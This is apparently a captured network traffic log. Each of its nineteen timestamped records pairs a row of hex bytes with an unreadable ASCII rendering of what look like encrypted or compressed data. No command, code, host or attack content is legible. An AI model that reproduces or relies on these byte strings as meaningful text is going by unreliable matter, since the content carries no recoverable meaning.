                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24376INData Raw: 82 97 d1 38 b7 d0 31 93 7d 2c 1e 58 1d 4c d6 80 c5 00 51 57 bf 75 10 17 a8 05 38 9b b2 ef 94 30 af b3 33 47 ad 7c 7d 96 3c d8 bf 84 75 ef 05 d7 5e 30 f3 8e 59 43 31 f3 21 c9 6b 86 44 f8 ab c3 47 a2 14 77 53 c6 ce 25 3f 8a 35 d1 2d f3 d8 23 39 ec 28 b9 70 fd ae 77 58 11 e3 b8 d1 df c5 69 7a b3 60 d6 97 e2 69 d1 94 13 f7 a1 2f 46 17 60 ae a9 fa a9 02 54 db 93 99 25 90 42 d0 dc b8 38 47 83 0b cc 51 24 fe 57 a7 a3 73 49 57 36 24 80 93 9a 04 52 18 e7 ca 8f 4d 31 cf 6a 5d 1b a6 1b 89 a7 80 2c 53 4b 73 2d 67 cc f7 20 19 8f ac a5 db a3 5d 53 53 9f a9 d3 a9 93 74 2b b0 5d eb f8 01 f0 c2 44 91 f7 70 10 d7 eb 21 db 7a c0 72 62 06 23 d9 be 26 37 50 17 3d 24 24 e9 dc 65 c6 28 23 aa 2e 60 5f 81 fd 55 a5 5d 26 4b 15 ac 37 e9 f6 06 13 c3 64 cc 55 9d 36 27 58 14 88 27 7e
                                                                                                                                                                                                                                    Data Ascii: 81},XLQWu803G|}<u^0YC1!kDGwS%?5-#9(pwXiz`i/F`T%B8GQ$WsIW6$RM1j],SKs-g ]SSt+]Dp!zrb#&7P=$$e(#.`_U]&K7dU6'X'~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24392INData Raw: 08 dd ea 09 6a 0e ed bb dc 01 69 e8 6c f0 fb 56 ff 89 07 4b d8 88 4a f8 8c 59 70 16 93 f1 d9 5f 40 d5 df 6f d7 a1 b9 c0 a0 97 c4 d9 9f 33 f8 22 11 66 b7 a3 4f a6 ac 02 7f 8f e3 91 c1 df 99 34 ab 22 a3 35 2a b9 72 2d 09 53 4c a9 cb a2 61 30 32 0d 6e 07 7d 21 11 81 d8 c0 1b c2 03 bf 72 f4 a9 c3 ac 91 2d a3 fd 51 8c e4 2a 8d 50 17 9b 2a 37 c3 16 1b 28 f4 56 7f 58 b9 41 38 ae a4 80 51 4e a4 00 05 66 14 9b 75 b8 28 0c c1 50 ff ad 86 ec ff 87 6f 77 cf e2 07 ea 09 d7 f7 67 73 26 7b 43 cf a1 52 90 7d 10 b9 71 a0 ac b9 cd bd 6f b2 cc fa 37 a1 ae 1a cb 8c b6 c0 99 a8 73 6e 39 e7 24 d4 86 fb cb e4 18 82 40 31 65 f9 1f 03 16 e5 ce a2 7c f7 26 83 bb 44 a4 e8 50 91 92 66 37 4e 41 5c 47 1c 0d c0 a9 7c 84 0a ae 0d f6 c8 16 33 79 28 3d 55 ba e5 72 df 1b 42 8a 7f 0a 5b d3
                                                                                                                                                                                                                                    Data Ascii: jilVKJYp_@o3"fO4"5*r-SLa02n}!r-Q*P*7(VXA8QNfu(Powgs&{CR}qo7sn9$@1e|&DPf7NA\G|3y(=UrB[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24408INData Raw: 1f 7b 58 61 ab 0d a2 3a e0 cd f1 d4 be e4 54 72 91 ac 66 06 49 70 26 5d af 9a 20 69 40 1b 77 af 76 63 67 45 29 5a e1 da aa 12 cf 4c a1 6e 02 63 df 2d 4e 1c de c8 3a e0 af 30 42 ff e3 87 c9 cf 3c ca ce 7c c3 37 ee 30 32 08 25 f2 10 6a f5 b3 44 81 c9 1e ad 50 b0 3f 6d 2d 65 22 6f fc 58 55 6a ea 2e 53 7c 5c 35 90 4e ef 3a 21 a1 3e da 03 d8 78 ed 71 c3 c3 95 9b 18 1c f9 f3 8d 07 49 86 95 25 c5 d6 04 99 0c e7 ad 6a e7 22 45 58 5f 24 57 54 1a 46 dc 3d 32 ca 46 6d 08 2d 61 62 1f 14 e5 4d 0a 6f 60 96 f4 09 88 8e 52 bf 05 5e f8 9f c4 ba e6 12 c8 35 63 17 b8 b5 6f f2 e0 bd 8c 49 82 4f 70 5c 49 79 51 cf ce 42 0d c2 d9 f6 06 23 f8 73 46 16 a3 53 ce 41 c7 41 df a9 87 a7 1b e0 75 92 f3 90 68 7a 04 3e 8a 84 72 26 a3 6d 4e 63 fd df eb 89 a1 3b b2 bf 56 97 b1 51 e1 c3 94
                                                                                                                                                                                                                                    Data Ascii: {Xa:TrfIp&] i@wvcgE)ZLnc-N:0B<|702%jDP?m-e"oXUj.S|\5N:!>xqI%j"EX_$WTF=2Fm-abMo`R^5coIOp\IyQB#sFSAAuhz>r&mNc;VQ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24424INData Raw: c2 e8 58 44 e9 18 67 23 cd 9a f4 b0 e6 6f 40 34 8a 58 9c ae ac e6 c1 7c ff 2e b8 21 a1 5d f7 ae 7b 3a bb ce 1a 35 03 f4 27 f0 02 40 3a 77 57 af 9a e5 e9 7d 42 e8 86 e7 c3 f2 d7 08 59 63 5c e3 ce 88 f2 51 06 5b 24 6c 0e ce f1 64 c3 be 61 4a 41 6f 82 82 bc 01 17 5f 29 66 7f db 72 8b 90 3a 8a 0b 7d ac 0a 33 b9 b9 a9 eb cd 13 4e 75 8d 62 e7 b0 01 b2 d7 19 0c 69 bd 21 aa d7 f7 14 f2 f3 5e b2 ce 93 05 b1 93 8c 01 2a b9 d1 51 37 b6 84 41 2c 3f ff 3c 60 4c d9 70 b6 e4 45 c6 c0 06 a3 f5 59 0a 37 75 43 87 6e 8f 48 53 ab 15 55 c9 21 24 25 f1 38 a2 6e 4d 83 1f e9 f0 85 84 2a d1 b0 96 5a 5b 44 44 58 5d f2 21 45 83 18 d2 60 3e ed 8d 90 f6 6d c6 2b af d0 fe c5 d5 d6 0d 70 23 b8 04 91 8a 0f 15 76 cb 60 78 ee e4 80 04 59 28 5e af 06 1c ef 77 87 39 04 d7 ea e8 46 7c 13 78
                                                                                                                                                                                                                                    Data Ascii: XDg#o@4X|.!]{:5'@:wW}BYc\Q[$ldaJAo_)fr:}3Nubi!^*Q7A,?<`LpEY7uCnHSU!$%8nM*Z[DDX]!E`>m+p#v`xY(^w9F|x
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24440INData Raw: 0b 86 92 78 58 5f f4 28 df ee b0 9e a4 5b f2 84 a5 eb e3 eb 87 fb 7a dd dd 4e 61 18 e0 25 84 12 5e 2b d1 6e a4 32 63 2c a2 6b f7 b2 1f 6e 94 00 9d 5d b8 50 7a 3c a4 b0 4f ce 07 a4 d2 d6 f7 cc ef 3f b7 1f f1 d5 e7 20 10 9e 3b 41 08 e0 1a ec 76 01 e7 1b 15 c2 a5 3c e3 25 9b 8d b0 09 e6 ae fe 52 48 93 bf be 74 55 33 56 54 64 83 f8 62 34 9a b0 4a 98 8d 2b c2 a9 ac cd ee af 1d 6c d8 85 5d bb 05 20 bc a3 ad d7 29 be 7d 2a ab c8 9b 8f 7e d7 8a 3a e7 91 0f ce bc 59 88 02 84 47 45 a4 04 3a a7 0f cb f1 61 a9 09 ba 4d 1e 65 57 e9 f9 56 03 3c 51 9e 95 76 38 4f 43 25 e3 f0 61 e7 71 03 4d 14 85 9f 1a ef 98 88 e0 73 c6 db a1 1c 51 e8 22 31 8f b6 ea fd 96 92 be f3 13 4a d0 fe b4 ba 37 98 60 5a 94 a9 9e 6f 27 1a 44 27 88 51 9e d4 21 a7 95 0e f0 23 04 57 54 0d 45 a7 1b 25
                                                                                                                                                                                                                                    Data Ascii: xX_([zNa%^+n2c,kn]Pz<O? ;Av<%RHtU3VTdb4J+l] )}*~:YGE:aMeWV<Qv8OC%aqMsQ"1J7`Zo'D'Q!#WTE%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24456INData Raw: aa 54 26 ef 83 b4 11 96 43 d3 a2 c6 27 72 df 47 a1 dd 37 05 c1 f0 27 37 a4 eb fa a1 21 63 df fd a2 07 ca dc 8e 0f 2b 1a e7 f9 89 83 f8 46 69 10 90 6d 14 92 61 6b 81 e0 a6 c8 3d 29 58 e0 53 45 d1 91 c4 16 ee af ff 0f 71 48 57 d4 a7 af 71 d6 6b ac c4 c6 7d 5b 11 7b 5f c4 06 37 ae 38 a5 5c bc 7a b3 38 70 7c 4b ea 7e 74 de 0b 90 dd 5d 90 96 b3 c5 41 42 e8 25 56 8b e4 95 3f 14 9e 9f 8e 6e 9d b9 50 6f 00 e7 9c f5 4b a5 3c ac 06 1f 27 b0 5a 1b ad 68 07 bb d6 c4 5b ad 7d 42 9a 91 53 e6 3a bf f5 9d c9 9a 8d b1 87 c1 f3 39 b8 d7 2d 59 10 d8 91 85 35 4e 4f e0 1d fc a6 4a 81 3e 94 2a 75 20 c1 6f a1 0c 57 f0 62 a7 39 f8 a5 aa 18 c5 81 f5 43 37 7c 63 01 6a 55 de 97 ff 40 5b 1e f1 ea 4f f3 2e cc e2 cd 53 54 ca 20 8e 10 2d fc 37 ee 06 d3 12 c8 33 39 c0 d0 f2 16 b3 25 4b
                                                                                                                                                                                                                                    Data Ascii: T&C'rG7'7!c+Fimak=)XSEqHWqk}[{_78\z8p|K~t]AB%V?nPoK<'Zh[}BS:9-Y5NOJ>*u oWb9C7|cjU@[O.ST -739%K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24472INData Raw: 24 ea 3b 80 5d ec e7 c4 ee ea 9d fd 67 75 9d 04 b4 44 3a 83 12 49 6c 17 ef 38 36 99 ef 7e 75 43 df 19 38 b5 bf c7 02 98 e6 fc 03 d0 29 45 44 d3 d3 50 96 5e 00 7a 53 86 90 7f d0 22 7a 32 fa c7 3e 18 44 b7 1d 78 fe d7 b5 3b 23 ce 27 3c d3 9b e4 37 b6 59 a1 3b ea 09 46 3c e3 10 7b 35 4c 78 24 d3 53 88 63 75 38 85 05 e7 e6 c4 22 49 4b 52 d8 b9 c2 12 b7 5f 3f 0b 71 9a fe 30 53 99 be 7c 70 6c 2c fa 47 f7 d8 59 d4 06 e2 55 cd 60 e8 79 00 44 c1 2e 51 d5 c3 eb a8 c0 ff 0b e5 08 46 1d 0d cd 7d 7d 41 2f 6b 0d 38 78 7c 44 ce 8f 7f 36 02 68 5f 7c 38 ea eb 25 bd bb 25 7e 95 55 0e d1 ee c1 46 8b 0a 31 f2 13 50 7b a5 37 70 fa 30 ad 76 00 86 b8 31 16 92 b3 6e 55 54 b7 fd 34 b6 8f 05 98 56 e5 6a 8f 14 e0 6a 2f 9d b9 28 b8 a9 1d 15 42 89 35 55 2f e2 29 cb c4 b6 1e c0 b0 b7
                                                                                                                                                                                                                                    Data Ascii: $;]guD:Il86~uC8)EDP^zS"z2>Dx;#'<7Y;F<{5Lx$Scu8"IKR_?q0S|pl,GYU`yD.QF}}A/k8x|D6h_|8%%~UF1P{7p0v1nUT4Vjj/(B5U/)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24488INData Raw: 04 ab f1 80 2d 4d 2f 99 4d 7f 7a c0 83 60 09 1b 8e f8 98 78 8e c1 0b 46 67 96 42 4b 74 4d 3b 12 89 54 c0 cb 2f 6a 84 63 f6 82 33 7f 82 81 a8 08 2f e1 3f 8c 67 1c c9 3c 02 19 87 7d e4 37 a7 58 25 72 c6 14 c6 ee 18 ae f9 01 34 74 c1 89 2f 64 ed a4 79 c5 be 17 37 82 1b 1a 04 99 07 8a d1 bc 24 14 65 c5 8f b6 20 ce 17 82 81 4b c2 3f 7b 88 31 f9 a2 1a 0f 51 17 ef 32 32 6f 0a 3a 8a 0e ad 25 a9 45 9f d6 2c 23 86 9e 93 fc ff a5 77 cf c0 ad 75 4f 9b 9e 55 ae 07 61 3c 13 7e d4 ff 1e 75 12 63 c3 44 53 ed dc b4 db fa 78 de c9 b9 e0 ee 17 20 6b ea 18 33 f0 dd 34 4e 30 6e 55 81 5a df 56 ff f8 87 3c f1 57 f7 ab 9e 68 29 6a 15 32 19 63 e2 22 dd 9d f3 9c 45 31 91 e9 86 a0 a8 d0 bb 8c 57 20 46 20 87 fc c3 f4 2f fb 00 29 7e f8 48 e0 76 88 d6 5b 3f 80 f9 9c b9 53 24 d2 4e f0
                                                                                                                                                                                                                                    Data Ascii: -M/Mz`xFgBKtM;T/jc3/?g<}7X%r4t/dy7$e K?{1Q22o:%E,#wuOUa<~ucDSx k34N0nUZV<Wh)j2c"E1W F /)~Hv[?S$N
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24504INData Raw: 7b ee 41 d7 5a 00 1d 33 2d 4d d2 97 7d ee e0 f1 f0 9e e8 47 79 a9 99 df 5a e2 99 68 18 e2 d9 07 ed e4 db 36 34 6c a0 ba 48 22 a8 ae f2 c5 70 c8 9c 82 12 8b 97 04 72 c1 4d a6 64 ec fb 56 8a 3f 43 a0 19 c6 22 7c 1e 11 7f ef e6 ee 9b 78 fe 55 d4 ef 9c 8f db d4 cf f2 46 cf c8 47 07 7f af fd a8 bd d5 ad 10 9d c7 56 c9 fa 1b 4f be fe 23 0c df 16 b9 f7 b9 67 05 71 01 7b 5c 1d 33 8e ed 2f 5f e5 a2 e5 f7 c8 3b b6 c6 bc fb a7 41 b2 e9 68 ff f0 c2 75 1a b3 59 6e 42 a4 02 fb 9c e8 3b 58 1d 96 56 5b 35 8a a9 f4 f2 f0 59 79 f3 bf e4 b3 d8 f2 47 ad 99 c8 4e 62 35 13 66 01 18 7f f4 85 d8 c5 7a 81 4f b5 e6 37 0c f3 02 d4 d5 75 b8 bc c1 fc 4f 7b ba 1b f4 dc e9 64 98 b0 78 54 70 bb fb 98 27 85 88 86 2d 1b 04 5b 93 da 14 bb bf 1a 3e 8d 91 08 46 3c 7a d2 79 e2 91 5e b2 99 30
                                                                                                                                                                                                                                    Data Ascii: {AZ3-M}GyZh64lH"prMdV?C"|xUFGVO#gq{\3/_;AhuYnB;XV[5YyGNb5fzO7uO{dxTp'-[>F<zy^0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24520INData Raw: 3c e5 04 09 3f 18 11 b6 20 8b f6 24 13 1b 7f 32 c3 f5 38 b2 1a a3 8f 53 ef d9 b8 64 c8 52 fb ef e8 d3 12 6e 70 4a 58 06 6f 00 6b 44 95 1c 61 e4 14 ed 1f f1 5b 23 9e 9f d4 84 2b b3 ac 30 da d0 8e b7 f0 8a 3a cb 7b 15 ae 80 f9 91 d0 21 0b 19 1e 30 08 e3 2e c8 7f 75 6b b7 f8 4a 2a c3 63 f3 34 c2 1d 13 e9 30 83 98 6a 36 e7 d5 22 fb f3 5f bd 42 b2 6e 5b 36 d1 ba 7a 48 b2 46 cb d9 ee f1 bd cf fc 20 c7 a7 2a 23 43 be 21 a3 f5 95 b9 c1 41 40 6a 8e c2 2e cf 7c 00 a2 94 7c b5 42 64 92 88 04 c8 4a 52 94 97 e2 9b 27 fe 92 53 4c ed 88 fa a3 1c 4d 7f e4 16 79 3c 1e 00 58 e5 4f 69 86 64 65 c2 a1 c2 9f c0 c3 db 9e a6 80 db 6a f1 b6 bd 07 a9 3d 76 1c be 52 76 59 ff ed d4 58 e8 80 a1 8d ce 1d 25 15 a9 21 00 b3 50 ba dd a4 0f 59 89 66 07 b2 6e f1 27 34 f2 4d bb fd db 44 ce
                                                                                                                                                                                                                                    Data Ascii: <? $28SdRnpJXokDa[#+0:{!0.ukJ*c40j6"_Bn[6zHF *#C!A@j.||BdJR'SLMy<XOidej=vRvYX%!PYfn'4MD
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24536INData Raw: 99 bf 1b 61 1f 7a 23 e7 8d b4 d4 1e d7 45 a2 fc bf e2 6d a5 7e 99 51 58 4d bc 8f 8d 83 f3 ec 99 89 f8 e3 28 0a 4b fc 1b 79 13 36 7a 02 7f 31 75 11 ac 84 2d 6a c0 09 7f bf 04 f2 55 92 27 03 56 fa de 9e f4 e6 6a d6 8c 8f 73 e8 ec 9e 59 b0 87 8f 7f 6a 18 14 07 8e 23 99 94 f5 8b 1b f5 d8 23 a6 ae 1a 31 18 db fe 89 34 65 28 46 cd b7 cd 0c 48 55 d4 ab 09 b8 6e 06 0c 04 cb 6b 3e 22 97 1b 22 9c ed 45 74 12 38 73 ad e0 13 e5 d6 37 21 ac b1 ca f8 5b 07 ad a6 82 39 9c a2 26 9a 6f 3b b2 7f f4 a7 77 e7 b8 4f c4 fb 19 c3 63 5a 7e 2b 14 3c 37 fe c8 70 89 3e db a4 9e b4 57 52 53 4f 30 1c ed de 48 ed cb 3a ba ca 51 33 39 a7 42 96 94 7f 02 da 45 56 9f db 93 48 1f 44 ab 5b 49 9e 89 5e a6 1f 9c 21 76 ab 56 b2 3e 47 67 d6 87 c5 1e 22 4b 25 ee 37 9e de 0a 1f d7 c6 6e f3 f0 c4
                                                                                                                                                                                                                                    Data Ascii: az#Em~QXM(Ky6z1u-jU'VjsYj##14e(FHUnk>""Et8s7![9&o;wOcZ~+<7p>WRSO0H:Q39BEVHD[I^!vV>Gg"K%7n
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24552INData Raw: 62 ee 8b 01 c0 d1 a6 a5 bf 92 d5 7a b6 1a cd 5c f5 ba b9 97 1e cb 28 11 55 14 09 11 e1 c7 68 f1 36 77 51 fc 2b 60 00 29 a5 e8 d5 6a 18 a6 6b 3e 99 dc e9 57 f5 a4 55 f9 36 89 dc 42 c2 c9 11 5b 8b 18 50 e2 ec 73 0d 9b 8a 82 ce 7f 7e 1e 0e 94 a5 f1 93 dd d7 4b 18 fa 68 7a c7 c9 36 ab 3b a4 ef 80 72 68 cc 23 45 ed dd 79 b4 e4 4d 58 96 37 54 2d 50 09 35 d8 e9 db ea b4 09 f9 4c b3 08 47 69 9f 3d 41 0f dd e2 7d 35 1c e0 17 b1 6b be 81 8b 5c 9d 0e c4 42 e5 e2 4a c8 ea 6d 37 a5 18 58 46 24 1c fe bb e1 81 a9 23 84 68 11 58 47 a4 f9 7b 8d 05 df 6c 92 d3 7f 72 df cb 95 c6 ab d4 ac fa e0 88 e4 c9 16 12 a2 2e 91 93 e4 cc 0f a2 cb ec 72 34 cc 1b 7d 2b 5c 2f cd d0 c4 73 ec 94 a0 af 0c f4 9a 86 18 e8 8b 60 6b 48 fc 2d 2a 0e 5a e8 a6 4a 01 4f eb 7e cc 03 46 84 2e 60 7f 91
                                                                                                                                                                                                                                    Data Ascii: bz\(Uh6wQ+`)jk>WU6B[Ps~Khz6;rh#EyMX7T-P5LGi=A}5k\BJm7XF$#hXG{lr.r4}+\/s`kH-*ZJO~F.`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24568INData Raw: 8f b7 85 29 bf bd c8 ba ed 41 2e be 5e 13 22 83 d2 68 38 24 45 41 43 90 8f 64 42 04 c5 cd a4 1a 71 f9 75 95 da 30 fb 72 44 bd c6 8b 03 54 be a7 a5 84 6d 6f f8 5a 92 a6 09 f0 2b 5f ef 15 93 f7 cb 76 7b bb 78 71 83 aa 4c 3d 71 8b fe d2 3e 36 a4 8e 80 ce 44 5f 34 65 82 5e 3c ec fc 83 d5 86 f9 cc 08 24 25 61 82 1a 38 6e eb 7c 3d da 84 20 e6 f3 5a 7e 05 03 46 38 bf dd 8c 9c da f1 de 38 67 99 ed ef 79 05 48 2f 2e 17 38 6a 8d ff c4 da f8 8b b4 fa 1b a9 7f c9 ec d8 b9 d4 15 50 4b 0c 2f f7 08 35 a0 0d 15 f2 be 85 8e a2 a9 1f d0 76 cf e7 e0 d4 1d 1e 75 47 1d 87 0f d4 77 e0 3a 21 ee 86 4a c0 6b e9 f8 11 9c 76 de 79 73 ac 6f e9 1f 3e a8 99 ef 9e 3b 77 a0 5c dd 71 32 df be 76 fb 36 6e 1d 78 4d 33 32 14 db 45 79 4c e5 94 19 97 67 47 e2 56 b7 c2 a2 06 75 5b 88 2f 86 d2
                                                                                                                                                                                                                                    Data Ascii: )A.^"h8$EACdBqu0rDTmoZ+_v{xqL=q>6D_4e^<$%a8n|= Z~F88gyH/.8jPK/5vuGw:!Jkvyso>;w\q2v6nxM32EyLgGVu[/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24584INData Raw: e9 86 35 26 30 44 52 81 e6 2e 55 54 a2 38 0c ff a3 65 74 69 f7 b6 4f 38 a8 d6 0b 64 6f a5 02 e1 01 99 3b 8e af db 17 7d c2 e6 aa f0 cd 20 f9 a4 8b b2 9b 3c f5 3b 38 00 54 91 2b 2d 99 6f cf c5 c8 3e 4d 87 fd d9 d2 99 e2 84 58 c3 b7 1c 77 ae 5d 56 da e7 fb 59 a4 d5 ba f8 79 3d 6e ce 6b 05 c9 e3 c4 56 f1 d9 1d 2c d9 36 5f c0 27 c0 a7 02 32 22 1d 45 9f 89 35 23 2f bd fa f3 d1 77 a8 ae d5 c7 3c cd b6 be b9 fd 9d 0a 3c c9 45 86 ca 18 93 92 94 b8 d4 85 fc 97 d8 92 95 27 93 ab 4c 99 52 c4 47 37 7a 4e 54 b4 21 1a 38 69 0c cd 87 e7 87 26 3e 10 0d 09 78 36 c2 52 5c cf a1 76 36 93 84 b1 09 fc 2e 09 68 8c d3 49 7b 9a df cf 22 9b 10 9c ed 98 94 f8 3d 76 cd 18 55 3e 2e 96 71 ea be d8 ec 77 51 c2 af a0 75 b7 75 73 dd db df 58 a3 af f5 a4 85 14 b4 4b 1b 8d 5b dc d1 c9 ee
                                                                                                                                                                                                                                    Data Ascii: 5&0DR.UT8etiO8do;} <;8T+-o>MXw]VYy=nkV,6_'2"E5#/w<<E'LRG7zNT!8i&>x6R\v6.hI{"=vU>.qwQuusXK[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24600INData Raw: 4e e4 48 33 fa cc 83 f7 24 41 41 02 e6 20 00 ed a3 68 fa 97 ef 72 d5 32 62 2f d2 6f e5 16 a3 09 0a a7 76 6e c5 75 72 a6 6d 1a 02 f9 52 10 c2 8b 7d 50 f2 71 b1 c5 e2 22 3a 85 2d ab eb 03 92 cd e4 d5 62 c5 8e a2 0e 26 75 87 41 fc 08 7b c6 b0 80 79 dc a2 67 54 ab bd fb 18 4a b9 24 0f bd 27 a8 c7 2c e2 e5 a7 41 8a 28 c3 02 83 71 e3 bc bb 77 57 84 02 93 54 6f ee 15 83 5a 2f 9e 65 54 41 57 15 ad f9 57 30 24 44 60 6f 72 a8 be 74 f3 d3 82 a2 49 15 3a b1 a2 6a d1 f4 13 fd da a0 84 f9 d0 39 4e aa dd bb aa 2d b5 35 8a db 9e f3 19 14 62 55 33 4c 9b 14 04 bc 89 e6 3e c7 63 6e 31 be 3d 37 46 0f 4b 69 62 32 b7 02 04 13 82 aa c7 9e d6 45 95 27 06 a0 4a 5d cd b4 b9 b8 4e e0 d2 37 14 0a f6 69 41 ff 75 c4 96 b7 a7 c2 86 da 67 ab d1 d9 ff d1 57 70 30 a7 9a 0f 44 f0 a8 50 0c
                                                                                                                                                                                                                                    Data Ascii: NH3$AA hr2b/ovnurmR}Pq":-b&uA{ygTJ$',A(qwWToZ/eTAWW0$D`ortI:j9N-5bU3L>cn1=7FKib2E'J]N7iAugWp0DP
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24616INData Raw: 86 ef 8e aa 25 85 7c a8 ca fc 5b ce f5 58 c7 49 a4 5a 29 2e de c8 09 8b cb 89 2e 83 f7 4a c9 41 62 28 a9 e7 03 73 93 8c 52 8f 33 d8 c7 42 69 1a 04 c6 f0 df 3d 80 b8 e5 f6 49 f2 dd 38 22 0a ae cf 80 e3 fb ff 37 02 f3 ed e4 85 7f 64 f2 4c a6 31 d1 9c 14 f0 29 43 36 95 64 53 92 dc d9 d0 d0 42 46 8d a2 ed ea 20 3e 54 b4 01 60 e9 aa ff b5 63 df 88 31 e1 17 d7 e5 f8 38 92 3a 2b d9 e1 21 39 2d b6 9b 6d 51 8f af 77 30 99 24 d1 c8 9d b8 05 ff fc b6 dd 0b 04 55 22 50 8b b6 75 06 73 03 5d 7e 95 85 c3 4a cf a9 57 7f 90 65 7f 56 fb 85 15 d4 31 95 7a 01 33 12 09 21 b5 ac 9f 29 d5 1a f5 22 c9 ac aa 03 18 cb 08 da 9c 0e ed 08 b1 ec c4 d7 34 de 08 67 a4 de 0e dc 9d 7b 1a 89 e3 4b f3 6c 92 3d e9 f8 88 7b f8 62 36 3b e5 09 b7 30 ca ff 37 50 51 47 cd 65 1d 3a 1e d5 f6 14 d9
                                                                                                                                                                                                                                    Data Ascii: %|[XIZ)..JAb(sR3Bi=I8"7dL1)C6dSBF >T`c18:+!9-mQw0$U"Pus]~JWeV1z3!)"4g{Kl={b6;07PQGe:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24632INData Raw: 8b ba 5d 01 e2 e0 ee 89 f2 d5 3e 00 96 22 ff f1 25 57 20 41 90 48 a5 2b 5d 27 0a 00 9a 73 0f a0 e0 51 ff 18 13 34 ed 0d d6 b4 e6 72 f0 7c 9e 76 57 fd cd 7d 1d fa 75 41 52 f0 04 19 4a 9d db 5d f4 9c ca d6 76 42 2e aa 6a 24 c9 f7 88 22 6b 4a 5b 48 69 80 ae 6b 94 d4 ab 9b d2 6f 14 1f b0 ba c4 72 7f 45 9b ab 43 a0 98 19 1d e1 22 9c 20 de fd b1 3d 08 5c 8b 06 e7 5c 39 25 85 dc 2e f3 8c 71 10 90 cc 0a 59 ab ae 6e 61 87 bb 66 6a d2 f9 8e fd 61 10 d5 ba 09 1a f2 01 7b 00 c4 5e 31 cb 5d bf 71 ba 54 d6 9f df 0e 65 35 8a 14 8d e6 3f f0 ff 2d 19 77 da 54 53 4a 0b 9b 7a 64 f5 aa ad 22 bf 9b ed 81 a2 b2 b0 c4 ba 73 59 a3 aa 4d 5c 7a 25 3d 86 96 0e db c7 29 f3 eb b8 e8 a6 73 f5 4d a3 e5 d4 3d db 89 14 23 23 87 91 82 48 90 05 4a 7d 48 42 5e d3 62 4f dd 60 38 32 32 5a 5d
                                                                                                                                                                                                                                    Data Ascii: ]>"%W AH+]'sQ4r|vW}uARJ]vB.j$"kJ[HikorEC" =\\9%.qYnafja{^1]qTe5?-wTSJzd"sYM\z%=)sM=##HJ}HB^bO`822Z]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24648INData Raw: 22 9b 50 a2 e0 d9 02 6d 0a 27 13 c6 04 d5 f9 35 0c a9 79 08 6a 10 76 6a 1f 9b b3 ce bc 8d 75 0e 8e 22 e6 c3 06 69 e4 53 37 c4 40 0d 96 1c 73 26 a1 94 24 2f 9a 8a 6a 21 5d 32 b3 66 b8 f8 f5 9f 66 3f aa 74 bc e4 28 fe 5f 58 f6 58 a3 dd ef 6d 89 0e 86 fc 71 67 89 45 29 c4 7f ee 18 d7 55 0c 25 57 a1 d8 d5 4f 69 f4 32 30 a2 34 36 b1 e1 6c 9b 93 98 00 2a 2e bb da 05 4f 5d 20 a2 7c ba e1 fd 61 d5 b6 61 ff 36 eb e6 a8 d6 75 dc bf da 04 7d 93 b7 37 58 6c 80 62 41 64 d4 37 8a 13 94 3a 7a d0 89 4c ac 31 26 43 02 92 6d d9 af 15 d9 5e 0a 3b 96 68 4d 7c 22 40 01 44 b9 18 ea b8 3e a1 e5 a1 76 6f 49 73 fa ea 26 1c 10 28 96 43 dd 25 f3 59 16 2c 3b c4 68 0b 24 9e 6e 46 19 17 e5 1c ad d9 5b 78 59 77 59 f7 f6 54 d0 e7 f4 4d 74 34 30 a5 97 91 55 61 11 71 4f 40 3e 53 1c 24 8a
                                                                                                                                                                                                                                    Data Ascii: "Pm'5yjvju"iS7@s&$/j!]2ff?t(_XXmqgE)U%WOi2046l*.O] |aa6u}7XlbAd7:zL1&Cm^;hM|"@D>voIs&(C%Y,;h$nF[xYwYTMt40UaqO@>S$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24664INData Raw: 34 50 cb 93 bd b3 97 bf 5f a8 20 82 31 b6 9e a2 de 0d c0 25 e0 46 7e 14 11 51 32 af e9 a0 7b de 86 a9 e1 17 f6 02 79 28 d0 86 f4 28 5c e0 0b 2b d3 8d d2 3f 3f 8b 8a 04 16 87 7d 4d 03 ed 37 eb cd 18 d2 64 01 66 b9 95 f7 80 6a 8b 33 0c bc b5 65 ec c5 a0 3c c3 be fc 7c 2f d1 ba 01 aa 76 d9 f2 b8 cf be de 00 1c 54 2b 94 76 e1 14 e3 e1 0e 51 8c 54 e5 55 a7 c1 21 34 11 b6 39 5c 8d 5f e3 49 2c 2d 50 36 16 7f fc 2b 38 cf 93 ae 85 db 73 34 f9 df 9e c2 ab 76 83 d7 38 0e b8 73 69 b6 ff 0b 98 b6 2a 94 23 5c 5d aa 46 a8 50 98 c3 67 2e 06 50 d9 6f 9a 8d ce a5 d9 83 13 85 b1 93 06 32 8f f4 05 8a 52 f6 dc ee 1b aa 15 6a 5a 7e 4e 69 b3 4b 1f 42 9f 08 18 63 cd 47 3b b4 4e 95 8b 7b 52 9c b4 a5 bb 71 aa 41 e8 31 a6 68 83 ee ae cd a5 fe 61 13 87 a9 1c a7 18 c7 4c ec 97 35 fe
                                                                                                                                                                                                                                    Data Ascii: 4P_ 1%F~Q2{y((\+??}M7dfj3e<|/vT+vQTU!49\_I,-P6+8s4v8si*#\]FPg.Po2RjZ~NiKBcG;N{RqA1haL5
